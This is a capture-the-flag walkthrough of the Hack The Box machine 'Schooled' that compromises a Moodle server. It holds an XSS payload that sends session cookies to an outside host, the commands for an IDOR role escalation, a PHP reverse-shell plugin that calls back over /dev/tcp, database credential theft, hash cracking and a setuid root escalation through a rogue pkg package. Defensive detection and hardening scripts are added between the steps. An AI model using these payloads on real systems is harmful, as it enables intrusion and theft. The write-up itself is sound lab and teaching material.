Schooled
Sat, 26 October 2024
Platform: Hack The Box
nmapfull 10.10.10.234
Nmap scan report for 10.10.10.234
Host is up (0.029s latency).
Not shown: 64869 closed tcp ports (reset), 663 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9 (FreeBSD 20200214; protocol 2.0)
| ssh-hostkey:
| 2048 1d:69:83:78:fc:91:f8:19:c8:75:a7:1e:76:45:05:dc (RSA)
| 256 e9:b2:d2:23:9d:cf:0e:63:e0:6d:b9:b1:a6:86:93:38 (ECDSA)
|_ 256 7f:51:88:f7:3c:dd:77:5e:ba:25:4d:4c:09:25:ea:1f (ED25519)
80/tcp open http Apache httpd 2.4.46 ((FreeBSD) PHP/7.4.15)
|_http-title: Schooled - A new kind of educational institute
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (FreeBSD) PHP/7.4.15
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
| HY000
| LDAPBindReq:
| *Parse error unserializing protobuf message"
| HY000
| oracle-tns:
| Invalid message-frame."
|_ HY000
whatweb 10.10.10.234
http://10.10.10.234 [200 OK] Apache[2.4.46], Bootstrap, Country[RESERVED][ZZ], Email[#,admissions@schooled.htb], HTML5, HTTPServer[FreeBSD][Apache/2.4.46 (FreeBSD) PHP/7.4.15], IP[10.10.10.234], PHP[7.4.15], Script, Title[Schooled - A new kind of educational institute], X-UA-Compatible[IE=edge]
Email[#,admissions@schooled.htb]
sudo nano /etc/hosts
10.10.10.234 schooled.htb
enumdir http://schooled.htb
200 GET 235l 732w 11066c http://schooled.htb/contact.html
200 GET 4l 194w 8215c http://schooled.htb/js/modernizer.js
200 GET 142l 265w 4552c http://schooled.htb/js/custom.js
200 GET 461l 1555w 20750c http://schooled.htb/index.html
200 GET 357l 1352w 17784c http://schooled.htb/about.html
200 GET 364l 1095w 15997c http://schooled.htb/teachers.html
200 GET 1911l 7282w 57523c http://schooled.htb/js/mapsed.js
200 GET 312l 4320w 321575c http://schooled.htb/js/all.js
200 GET 461l 1555w 20750c http://schooled.htb/
200 GET 26l 53w 437c http://schooled.htb/js/01-custom-places-example.js
301 GET 7l 20w 231c http://schooled.htb/js => http://schooled.htb/js/
enumsub schooled.htb
Found: moodle.schooled.htb Status: 200 [Size: 84]
Found: *.schooled.htb Status: 400 [Size: 347]
Progress: 100000 / 100001 (100.00%)
sudo nano /etc/hosts
10.10.10.234 schooled.htb moodle.schooled.htb
[*] Created test account
test:Imahacker123!
Mathematics
Teacher: Manuel Phillips
Self enrolment (Student)
No enrolment key required.
Scientific Research
Teacher: Jane Higgins
You can not enrol yourself in this course.
Information Technology
Teacher: Jamie Borham
You can not enrol yourself in this course.
English Literature
Teacher: Lianne Carter
You can not enrol yourself in this course.
[*] Enrol on Mathematics course
You are enrolled in the course.
Topic outline
General
Announcements
Forum
Introduction
Calculus
Algebra
Geometry
[*] Announcements
Reminder for joining students
by Manuel Phillips - Wednesday, 23 December 2020, 12:01 AM
Number of replies: 0
This is a self enrollment course. For students who wish to attend my lectures be sure that you have your MoodleNet profile set.
Students who do not set their MoodleNet profiles will be removed from the course before the course is due to start and I will be checking all students who are enrolled on this course.
Look forward to seeing you all soon.
Manuel Phillips
...be sure that you have your MoodleNet profile set
...set their MoodleNet profiles...
[*] User profile settings
First name: test
Surname: test
Email address: test@student.schooled.htb
MoodleNet profile:
City/town: test
Select a country: Angola
Timezone: Server timezone (Europe/London)
Description:
[*] User profile settings edited
First name: test
Surname: test
Email address: test@student.schooled.htb
MoodleNet profile: "><svg/onload=alert(document.cookie)>' OR 1-- {{7*7}}
City/town: test
Select a country: Angola
Timezone: Server timezone (Europe/London)
Description:
[*] Profile page is alerting with XSS cookie
http://moodle.schooled.htb/moodle/user/profile.php?id=28
moodle.schooled.htb says
MoodleSession=0rqhc0u4j8eoac44qt2gnc9k1r
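Why the alert fired and why it showed the session cookie, as an added example that is not part of the original notes: the profile value was echoed without output encoding, and MoodleSession was readable from script. The template, function names and sample cookie value below are assumptions made for illustration, not Moodle's code.

```python
import html
from http.cookies import SimpleCookie

# Value entered in the MoodleNet profile field in the notes above.
PAYLOAD = "\"><svg/onload=alert(document.cookie)>' OR 1-- {{7*7}}"

# Hypothetical template: the field is echoed in an attribute and as text.
TEMPLATE = '<span class="moodlenet" title="{0}">{0}</span>'


def render_raw(value):
    """Vulnerable pattern: the stored value is placed in markup unencoded."""
    return TEMPLATE.format(value)


def render_encoded(value):
    """Hardened pattern: encode <, >, & and both quote characters on output."""
    return TEMPLATE.format(html.escape(value, quote=True))


def session_cookie_header(value):
    """Build a session Set-Cookie value that page script cannot read."""
    jar = SimpleCookie()
    jar["MoodleSession"] = value
    jar["MoodleSession"]["path"] = "/moodle/"
    jar["MoodleSession"]["httponly"] = True
    jar["MoodleSession"]["samesite"] = "Lax"
    return jar["MoodleSession"].OutputString()


def readable_by_script(set_cookie_value):
    """True when a Set-Cookie value lacks HttpOnly (document.cookie sees it)."""
    attrs = [part.strip().lower() for part in set_cookie_value.split(";")[1:]]
    return "httponly" not in attrs


if __name__ == "__main__":
    print("raw:    ", render_raw(PAYLOAD))
    print("encoded:", render_encoded(PAYLOAD))
    # Constructed cookie value, not a session from the target.
    header = session_cookie_header("constructedvalue")
    print("Set-Cookie:", header)
    print("script-readable:", readable_by_script(header))
```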
nano index.php
<?php
$cookie = $_SERVER['QUERY_STRING'] ?? '';
?>
MoodleNet profile: "><svg/onload=location='http://10.10.16.7:8000/index.php?'+document.cookie> OR 1-- {{7*7}}
php -S 0.0.0.0:8000
[Thu Oct 24 22:16:44 2024] 10.10.10.234:16960 [200]: GET /index.php?MoodleSession=nj82h9jrmg7kos2sudl6qk8o3j
[Thu Oct 24 22:18:49 2024] 10.10.10.234:30599 [200]: GET /index.php?MoodleSession=dhk0pni6tjs29i0n7rta122aak
[Thu Oct 24 22:20:54 2024] 10.10.10.234:11429 [200]: GET /index.php?MoodleSession=0ttrbpaqb6pq6rq20vsjinb3gj
[Thu Oct 24 22:25:01 2024] 10.10.10.234:44795 [200]: GET /index.php?MoodleSession=kune3ontihp2409q5488983e56
[Thu Oct 24 22:25:01 2024] 10.10.10.234:27622 [200]: GET /index.php?MoodleSession=kune3ontihp2409q5488983e56
[Thu Oct 24 22:27:06 2024] 10.10.10.234:17393 [200]: GET /index.php?MoodleSession=8gufs8rr8dgaog97q9unt14ndm
[Thu Oct 24 22:29:10 2024] 10.10.10.234:31022 [200]: GET /index.php?MoodleSession=chjse86f852glo84avucm4hrbc
[Thu Oct 24 22:33:17 2024] 10.10.10.234:54655 [200]: GET /index.php?MoodleSession=0rlre970c14uen41ohbvkls0ev
[Thu Oct 24 22:33:18 2024] 10.10.10.234:54656 [200]: GET /index.php?MoodleSession=0rlre970c14uen41ohbvkls0ev
[Thu Oct 24 22:35:22 2024] 10.10.10.234:56394 [200]: GET /index.php?MoodleSession=crh8kk433df49ekpq8etfe1b9t
[Thu Oct 24 22:37:27 2024] 10.10.10.234:30260 [200]: GET /index.php?MoodleSession=14o7fb52t0to16s3plsgjncj46
[Thu Oct 24 22:41:34 2024] 10.10.10.234:22592 [200]: GET /index.php?MoodleSession=e27tcmi660baj5jet8sv0ell8f
[Thu Oct 24 22:41:34 2024] 10.10.10.234:64945 [200]: GET /index.php?MoodleSession=e27tcmi660baj5jet8sv0ell8f
[Thu Oct 24 22:43:39 2024] 10.10.10.234:59440 [200]: GET /index.php?MoodleSession=99r1v9ca6gcuu3rkn692dgt1di
[Thu Oct 24 22:45:43 2024] 10.10.10.234:15889 [200]: GET /index.php?MoodleSession=umnqshaorfdup17b0n3cv63rk4
[*] Sessions belong to Manuel Phillips
Manuel Phillips
phillips_manuel@staff.schooled.htb
MoodleSession=umnqshaorfdup17b0n3cv63rk4
MoodleSession=14o7fb52t0to16s3plsgjncj46
MoodleSession=crh8kk433df49ekpq8etfe1b9t
MoodleSession=0rlre970c14uen41ohbvkls0ev
MoodleSession=chjse86f852glo84avucm4hrbc
MoodleSession=8gufs8rr8dgaog97q9unt14ndm
[*] Logged in as Manuel Phillips
You are logged in as Manuel Phillips (Log out)
Maths
Data retention summary
[*] Reveals moodle version 3.9
Moodle Docs for this page
https://docs.moodle.org/39/en/Course_homepage
[*] Users --> Enrol users
Enrolment options
Select users: test test test@student.schooled.htb
Assign role: Student
GET /moodle/enrol/manual/ajax.php?mform_showmore_main=0&id=5&action=enrol&enrolid=10&sesskey=BxjPIXJXCS&_qf__enrol_manual_enrol_users_form=1&mform_showmore_id_main=0&userlist%5B%5D=28&roletoassign=5&startdate=4&duration= HTTP/1.1
Host: moodle.schooled.htb
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Referer: http://moodle.schooled.htb/moodle/user/index.php?id=5
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MoodleSession=a9ldo5s7bbtok57h0tsctllm6i
Connection: close
roletoassign=0 ???
roletoassign=1 ???
roletoassign=2 Course creator
roletoassign=3 Teacher
roletoassign=4 Non-editing teacher
roletoassign=5 Student
[*] Lianne Carter is a 'Manager' role
http://moodle.schooled.htb/moodle/user/view.php?id=25&course=5
[*] Enrol Lianne Carter as a student
Enrolment options
Select users: Lianne Carter carter_lianne@staff.schooled.htb
Assign role: Student
GET /moodle/enrol/manual/ajax.php?mform_showmore_main=0&id=5&action=enrol&enrolid=10&sesskey=BxjPIXJXCS&_qf__enrol_manual_enrol_users_form=1&mform_showmore_id_main=0&userlist%5B%5D=25&roletoassign=5&startdate=4&duration= HTTP/1.1
Host: moodle.schooled.htb
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Referer: http://moodle.schooled.htb/moodle/user/index.php?id=5
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MoodleSession=a9ldo5s7bbtok57h0tsctllm6i
Connection: close
[*]===============================================================================
Insecure Direct Object Reference (IDOR)
CVSS v3 Score: 9.8 (Critical)
Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L
Summary:
- Attack Vector (AV): Network (N)
- Attack Complexity (AC): Low (L)
- Privileges Required (PR): None (N)
- User Interaction (UI): None (N)
- Scope (S): Changed (C)
- Confidentiality Impact (C): High (H)
- Integrity Impact (I): High (H)
- Availability Impact (A): Low (L)
===============================================================================[*]
[*] Manuel Phillips id #24
http://moodle.schooled.htb/moodle/user/profile.php?id=24
[*] Change Manuel Phillips's role to 'Manager'
&userlist%5B%5D=24&roletoassign=1
GET /moodle/enrol/manual/ajax.php?mform_showmore_main=0&id=5&action=enrol&enrolid=10&sesskey=BxjPIXJXCS&_qf__enrol_manual_enrol_users_form=1&mform_showmore_id_main=0&userlist%5B%5D=24&roletoassign=1&startdate=4&duration= HTTP/1.1
Host: moodle.schooled.htb
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Referer: http://moodle.schooled.htb/moodle/user/index.php?id=5
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MoodleSession=a9ldo5s7bbtok57h0tsctllm6i
Connection: close
roletoassign=1 Manager
roletoassign=2 Course creator
roletoassign=3 Teacher
roletoassign=4 Non-editing teacher
roletoassign=5 Student
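Detection sketch for the request above, as an added example that is not part of the original notes: scan web-server access logs for enrol/manual/ajax.php calls whose roletoassign falls outside what the enrol dialog should hand out. The log lines are constructed, and the allowed-role set (Student only) is an assumed site policy to adjust to your role settings.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Role ids as mapped in the notes above.
ROLE_NAMES = {1: "Manager", 2: "Course creator", 3: "Teacher",
              4: "Non-editing teacher", 5: "Student"}

# Assumption: site policy lets a teacher assign only Student via this dialog.
ALLOWED_ROLES = {5}

# Common/combined access log prefix: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines (documentation IP, placeholder sesskey).
BASE = ("/moodle/enrol/manual/ajax.php?mform_showmore_main=0&id=5&action=enrol"
        "&enrolid=10&sesskey=CONSTRUCTED&userlist%5B%5D={user}"
        "&roletoassign={role}&startdate=4&duration=")
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Oct/2024:22:50:01 +0100] "GET '
    + BASE.format(user=28, role=5) + ' HTTP/1.1" 200 54',
    '192.0.2.10 - - [24/Oct/2024:22:52:13 +0100] "GET '
    + BASE.format(user=24, role=1) + ' HTTP/1.1" 200 54',
    '192.0.2.10 - - [24/Oct/2024:22:52:40 +0100] "GET '
    '/moodle/user/profile.php?id=24 HTTP/1.1" 200 9120',
    '192.0.2.10 - - [24/Oct/2024:22:53:02 +0100] "GET '
    + BASE.format(user=24, role="abc") + ' HTTP/1.1" 200 54',
]


def find_role_tampering(lines, allowed_roles=ALLOWED_ROLES):
    """Return one finding per enrol request asking for a role outside policy."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/enrol/manual/ajax.php"):
            continue
        params = parse_qs(url.query)  # decodes userlist%5B%5D to userlist[]
        if params.get("action") != ["enrol"]:
            continue
        for raw in params.get("roletoassign", []):
            # Non-numeric values are reported too: the form never sends them.
            role = int(raw) if raw.isdigit() else None
            if role in allowed_roles:
                continue
            findings.append({
                "client": m.group("client"),
                "when": m.group("when"),
                "status": int(m.group("status")),
                "users": params.get("userlist[]", []),
                "role": role,
                "role_name": ROLE_NAMES.get(role, "unknown/unparseable"),
            })
    return findings


if __name__ == "__main__":
    for f in find_role_tampering(SAMPLE_LOG):
        print(f)
```

The lasting fix is the server-side check of which roles the caller may assign; the log scan only surfaces attempts, including ones made after patching.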
[*] Profile page now has Administration feature to 'Log in as'
You are logged in as Lianne Carter
[Manuel Phillips] You are logged in as Lianne Carter (Log out)
[*] Site administration tool is now accessible
http://moodle.schooled.htb/moodle/admin/search.php
[*] Manage the existing role using 'Define roles'
http://moodle.schooled.htb/moodle/admin/roles/manage.php
[*] Moodle CVE-2020-14321, Payload to Full Permissions
[*] Install Plugins feature is now available
http://moodle.schooled.htb/moodle/admin/tool/installaddon/index.php
[*] File structure of Moodle Plugin 'shell'
tree shell
shell
├── lang
│   └── en
│       └── block_shell.php
└── version.php
nano version.php
<?php
$plugin->version = 2020061700;
$plugin->component = 'block_shell';
nano shell.php
<?php
$lhost = "xxxxxxxxxx";
$lport = 4435;
exec("bash -c 'bash -i >& /dev/tcp/$lhost/$lport 0>&1'");
$sock = fsockopen($lhost, $lport);
if ($sock) {
exec("sh <&3 >&3 2>&3");
}
?>
[*] Upload 'shell.zip'
http://moodle.schooled.htb/moodle/admin/tool/installaddon/index.php
moodle.schooled.htb
Install plugin from ZIP file
Validating block_shell ... OK
Validation successful, installation can continue
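[*] Added example (not part of the original notes): the validation step above reports OK for a ZIP whose only payload file sits under lang/en, so a reviewer has to inspect the PHP before approving the install. The Python sketch below scans a plugin ZIP for process and socket calls and for language files that define no $string entries. The function name, the call list and both sample archives are constructed for this example.

```python
import io
import re
import zipfile

MAX_BYTES = 1024 * 1024  # refuse to read oversized members (zip-bomb guard)

# PHP functions that start processes or open raw sockets. Constructed list for
# this example, not exhaustive. The lookbehind skips curl_exec(), $db->exec().
RISKY_CALL = re.compile(
    r"(?<![\w>$:])(exec|shell_exec|system|passthru|popen|proc_open|"
    r"pcntl_exec|fsockopen|stream_socket_client)\s*\(",
    re.IGNORECASE,
)


def scan_plugin_zip(data):
    """Return sorted (path, line_no, finding) tuples for a plugin ZIP given as bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            if info.is_dir() or not name.lower().endswith(".php"):
                continue
            if info.file_size > MAX_BYTES:
                findings.append((name, 0, "file too large to review"))
                continue
            text = zf.read(info).decode("utf-8", errors="replace")
            # Heuristic: a language file is expected to hold $string[...] entries.
            if "/lang/" in "/" + name and "$string[" not in text:
                findings.append((name, 0, "language file defines no $string entries"))
            for line_no, line in enumerate(text.splitlines(), 1):
                if line.lstrip().startswith(("//", "#", "*", "/*")):
                    continue  # whole-line comments only; trailing comments are scanned
                for match in RISKY_CALL.finditer(line):
                    findings.append((name, line_no, "calls " + match.group(1).lower() + "()"))
    return sorted(findings)


def build_sample_zip(files):
    """Build an in-memory ZIP from {path: body} so the example runs offline."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for path, body in files.items():
            zf.writestr(path, body)
    return buf.getvalue()


# Constructed samples. SUSPECT copies the layout shown above (version.php plus one
# file under lang/en); its body is a harmless stand-in, not the page's file.
SUSPECT = build_sample_zip({
    "shell/version.php": "<?php\n$plugin->version = 2020061700;\n$plugin->component = 'block_shell';\n",
    "shell/lang/en/block_shell.php": "<?php\n$h = 'host.invalid';\n$s = fsockopen($h, 9);\nexec('id');\n",
})
BENIGN = build_sample_zip({
    "hello/version.php": "<?php\n$plugin->version = 2020061700;\n$plugin->component = 'block_hello';\n",
    "hello/lang/en/block_hello.php": "<?php\n// exec( in a comment is ignored\n$string['pluginname'] = 'Hello';\n",
    "hello/block_hello.php": "<?php\n$ch = curl_init();\ncurl_exec($ch);\n",
})

if __name__ == "__main__":
    for finding in scan_plugin_zip(SUSPECT):
        print(finding)
```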
[*] Persistence as user 'www'
http://moodle.schooled.htb/moodle/blocks/shell/lang/en/block_shell.php
nc -lvnp 4435
Listening on 0.0.0.0 4435
Connection received on 10.10.10.234 35800
[www@Schooled /usr/local/www/apache24/data/moodle/admin]$ id
uid=80(www) gid=80(www) groups=80(www)
cat /etc/passwd | grep -v 'nologin'
# $FreeBSD$
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
jamie:*:1001:1001:Jamie:/home/jamie:/bin/sh
steve:*:1002:1002:User &:/home/steve:/bin/csh
cd /usr/local/www
find . -type f | grep -w 'config' | grep -v 'lib'
./apache24/moodledata/muc/config.php
./apache24/data/moodle/cache/classes/config.php
./apache24/data/moodle/mod/quiz/accessrule/seb/config.php
./apache24/data/moodle/mod/chat/gui_ajax/theme/course_theme/config.php
./apache24/data/moodle/mod/chat/gui_ajax/theme/bubble/config.php
./apache24/data/moodle/mod/chat/gui_ajax/theme/compact/config.php
./apache24/data/moodle/config-dist.php
./apache24/data/moodle/theme/classic/config.php
./apache24/data/moodle/theme/boost/config.php
./apache24/data/moodle/backup/cc/schemas/config.xml
./apache24/data/moodle/auth/onlineconfirm/config.html
./apache24/data/moodle/config.php
cat ./apache24/data/moodle/config.php
<?php // Moodle configuration file
unset($CFG);
global $CFG;
$CFG = new stdClass();
$CFG->dbtype = 'mysqli';
$CFG->dblibrary = 'native';
$CFG->dbhost = 'localhost';
$CFG->dbname = 'moodle';
$CFG->dbuser = 'moodle';
$CFG->dbpass = 'PlaybookMaster2020';
$CFG->prefix = 'mdl_';
$CFG->dboptions = array (
'dbpersist' => 0,
'dbport' => 3306,
'dbsocket' => '',
'dbcollation' => 'utf8_unicode_ci',
);
$CFG->wwwroot = 'http://moodle.schooled.htb/moodle';
$CFG->dataroot = '/usr/local/www/apache24/moodledata';
$CFG->admin = 'admin';
$CFG->directorypermissions = 0777;
require_once(__DIR__ . '/lib/setup.php');
moodle:PlaybookMaster2020
locate mysql
...<SNIP>
/usr/local/bin/mysql
/usr/local/bin/mysql -u moodle -pPlaybookMaster2020 -h localhost -e 'show databases;'
Database
information_schema
moodle
/usr/local/bin/mysql -u moodle -pPlaybookMaster2020 -h localhost -e 'use moodle; show tables;'
Tables_in_moodle
...<SNIP>
mdl_user
...<SNIP>
/usr/local/bin/mysql -u moodle -pPlaybookMaster2020 -h localhost -e 'use moodle; show columns from mdl_user'
Field Type Null Key Default Extra
id bigint NO PRI NULL auto_increment
auth varchar(20) NO MUL manual
confirmed tinyint(1) NO MUL 0
policyagreed tinyint(1) NO 0
deleted tinyint(1) NO MUL 0
suspended tinyint(1) NO 0
mnethostid bigint NO MUL 0
username varchar(100) NO
password varchar(255) NO
idnumber varchar(255) NO MUL
firstname varchar(100) NO MUL
lastname varchar(100) NO MUL
email varchar(100) NO MUL
emailstop tinyint(1) NO 0
icq varchar(15) NO
skype varchar(50) NO
yahoo varchar(50) NO
aim varchar(50) NO
msn varchar(50) NO
phone1 varchar(20) NO
phone2 varchar(20) NO
institution varchar(255) NO
department varchar(255) NO
address varchar(255) NO
city varchar(120) NO MUL
country varchar(2) NO MUL
lang varchar(30) NO en
calendartype varchar(30) NO gregorian
theme varchar(50) NO
timezone varchar(100) NO 99
firstaccess bigint NO 0
lastaccess bigint NO MUL 0
lastlogin bigint NO 0
currentlogin bigint NO 0
lastip varchar(45) NO
secret varchar(15) NO
picture bigint NO 0
url varchar(255) NO
description longtext YES NULL
descriptionformat tinyint NO 1
mailformat tinyint(1) NO 1
maildigest tinyint(1) NO 0
maildisplay tinyint NO 2
autosubscribe tinyint(1) NO 1
trackforums tinyint(1) NO 0
timecreated bigint NO 0
timemodified bigint NO 0
trustbitmask bigint NO 0
imagealt varchar(255) YES NULL
lastnamephonetic varchar(255) YES MUL NULL
firstnamephonetic varchar(255) YES MUL NULL
middlename varchar(255) YES MUL NULL
alternatename varchar(255) YES MUL NULL
moodlenetprofile varchar(255) YES NULL
username
password
email
idnumber
secret
auth
moodlenetprofile
/usr/local/bin/mysql -u moodle -pPlaybookMaster2020 -h localhost -e 'use moodle; select username,password,email from mdl_user'
username password email
...<SNIP>
| grep -E 'jamie|steve'
admin $2y$10$3D/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5GFbcl4qTiW jamie@staff.schooled.htb
nano hashes
$2y$10$3D/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5GFbcl4qTiW
john hashes -w=rockyou
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!QAZ2wsx (?)
1g 0:00:02:21 DONE (2024-10-26 14:49) 0.007043g/s 97.87p/s 97.87c/s 97.87C/s goodman..superpet
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
jamie:!QAZ2wsx
ssh jamie@schooled.htb
id
uid=1001(jamie) gid=1001(jamie) groups=1001(jamie),0(wheel)
cat user.txt
0eb4aeaea44ef35de0784646773bcdbb
sudo -l
User jamie may run the following commands on Schooled:
(ALL) NOPASSWD: /usr/sbin/pkg update
(ALL) NOPASSWD: /usr/sbin/pkg install *
nano exploit.sh
#!/bin/sh
STAGEDIR=/tmp/stage
rm -rf ${STAGEDIR}
mkdir -p ${STAGEDIR}
cat >> ${STAGEDIR}/+PRE_DEINSTALL <<EOF
EOF
cat >> ${STAGEDIR}/+POST_INSTALL <<EOF
chmod +s /usr/local/bin/bash
EOF
cat >> ${STAGEDIR}/+MANIFEST <<EOF
name: mypackage
version: "1.0_5"
origin: sysutils/mypackage
comment: "automates stuff"
desc: "automates tasks which can also be undone later"
maintainer: john@doe.it
www: https://doe.it
prefix: /
EOF
pkg create -m ${STAGEDIR}/ -r ${STAGEDIR}/ -o .
chmod +x exploit.sh
./exploit.sh
sudo -u root /usr/sbin/pkg install --no-repo-update *.txz
Checking integrity... done (0 conflicting)
The following 1 package(s) will be affected (of 0 checked):
New packages to be INSTALLED:
mypackage: 1.0_5
Number of packages to be installed: 1
Proceed with this action? [y/N]: y
[1/1] Installing mypackage-1.0_5...
bash -p
id
uid=1001(jamie) gid=1001(jamie) euid=0(root) egid=0(wheel) groups=0(wheel)
whoami
root
cat /root/root.txt
3351bd9a6e7440ec577be8b824e3dbca
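[*] Added example (not part of the original notes): the root step above works because the sudoers rule lets jamie pick the package, and pkg runs that package's +POST_INSTALL script as root. The Python sketch below audits `sudo -l` output for rules of this kind. PAGE_LISTING is the listing from these notes; the package-manager list, the function name and CONSTRUCTED_LISTING are assumptions made for the example.

```python
import re

# Package managers whose install step runs scripts shipped inside the package.
# Constructed list for this example, not exhaustive.
PKG_MANAGERS = {"pkg", "apt", "apt-get", "dpkg", "yum", "dnf", "rpm"}
INSTALL_ARGS = {"install", "add", "-i", "--install", "localinstall"}

# One rule line of `sudo -l` output: (runas) [TAG: ...] command[, command ...]
RULE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(\S.*)$")


def audit_sudo_listing(text):
    """Return (command, auth, scope) for each root-capable package-install rule."""
    findings = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # header lines such as "User ... may run ..."
        runas_users = {u.strip() for u in m.group(1).split(":")[0].split(",")}
        if not runas_users & {"ALL", "root"}:
            continue  # rule cannot run the command as root
        auth = "NOPASSWD" if "NOPASSWD:" in m.group(2) else "password"
        for cmd in (c.strip() for c in m.group(3).split(",")):
            argv = cmd.split()
            if not argv:
                continue
            tool, args = argv[0].rsplit("/", 1)[-1], argv[1:]
            if tool not in PKG_MANAGERS:
                continue
            # A sudoers command listed without arguments accepts any arguments.
            if args and not any(a in INSTALL_ARGS for a in args):
                continue
            wildcard = any(ch in a for a in args for ch in "*?[")
            scope = "any package" if (not args or wildcard) else "fixed arguments"
            findings.append((cmd, auth, scope))
    return findings


# Listing copied from the notes above.
PAGE_LISTING = """\
User jamie may run the following commands on Schooled:
    (ALL) NOPASSWD: /usr/sbin/pkg update
    (ALL) NOPASSWD: /usr/sbin/pkg install *
"""

# Constructed listing covering a non-root runas, a pinned file and a bare command.
CONSTRUCTED_LISTING = """\
User deploy may run the following commands on build01:
    (www) NOPASSWD: /usr/sbin/pkg install *
    (root) /usr/bin/dpkg -i /opt/agent/agent.deb, /usr/bin/apt-get update
    (ALL : ALL) NOPASSWD: /usr/bin/rpm
"""

if __name__ == "__main__":
    for finding in audit_sudo_listing(PAGE_LISTING) + audit_sudo_listing(CONSTRUCTED_LISTING):
        print(finding)
```

A rule reported as "fixed arguments" is only as safe as the write permissions on the pinned package file.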